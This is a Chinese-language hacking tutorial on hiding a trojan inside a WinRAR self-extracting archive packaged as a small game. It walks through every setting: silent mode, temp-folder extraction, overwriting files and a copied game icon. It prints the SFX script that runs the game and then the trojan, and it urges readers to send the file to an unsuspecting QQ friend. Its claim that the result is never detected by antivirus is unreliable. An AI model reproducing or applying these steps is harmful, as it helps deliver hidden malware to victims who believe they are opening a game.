| 说到木马捆绑大家都会想起exebuilder之类的捆绑机,无奈现在安全白痴越来越少,当拿到一个陌生的的可执行文件时,都会习惯性的SCAN一下,这样木马一般就会现出原形,下面介绍一种永不被查杀的捆绑木马的方法 大家先想想看,木马放到什么地方时最Safe? 呵呵,你一定猜对了,是在RAR文件包里,可是这和捆绑有什么关系呢,别急呢,看完这篇你就明白了 下面就介绍这种利用winrar压缩软件的终极捆绑术 首先配制好木马服务端或其他的后门什么的,这里命名为木马.exe 然后要找一个捆绑的对象,比如一些小游戏等等,这里以小珂做的游戏魔幻水晶.exe为例(嘻嘻) 把这个游戏和木马放在一起,用winrar压缩成一个rar文件,点自解压格式如图
在“自解压格式”选项卡里选择 “添加新的自释放模块”, 然后在选择自释放模块里,选择”Default.sfx windows 图形 Winrar 自解压模块 ,
接着单击“高级自解压选项“,在解压路径里填"%systemroot%\temp",在释放后运行 里填上压缩包中游戏的名字,这里是“魔幻水晶.exe”。
接下来在模式的标签里面,选上“解包到临时文件夹”,“可选择性询问”,和“询问标题”留白不填,下面的安静模式选择全部隐藏 ,覆盖方式选择 覆盖所有文件, 上面的设置完成后,单击确定就生成了能够自接压的 "魔幻水晶.exe"文件,双击这个文件就能运行这个游戏, 但是我们的木马文件还是不能被自动运行,而且文件的图标是winrar自解压的图标。 下面就来解决这2个问题,首先图标问题好解决,随便从网上搜索点 图标提取精灵之类提取图标的小软件,就可以提取出原游戏的图标, 实际上也完全可以找个类似的游戏图表代替。 在刚刚生成的"魔幻水晶.exe"文件上点鼠标右键,选择用winrar-用winrar打开,然后点击“自解压格式”--自解压格式--高级自解压选项--文本和图标--浏览 选择我们刚刚导入的ico文件或替代品, 然后回到winraa主界面选择注释。
在”Setup=魔幻水晶.exe"那下行下面加上setup=木马.exe"此时的文件注释变为:下面的注释包含自解压脚本命令
Path=%systemroot%\temp SavePath Setup=魔幻水晶.exe setup=木马.exe TempMode Silent=1 Overwrite=1
运行这个自解压程序后,就会先 运行这个游戏,退出游戏的时候,‘木马。exe"会接着运行,这样就不会被别人发现了, 最重要的是我们打造出了永不被杀毒软件查杀的木马,接下来,就是把它发给你的QQ好友(某个倒霉蛋)^_^
|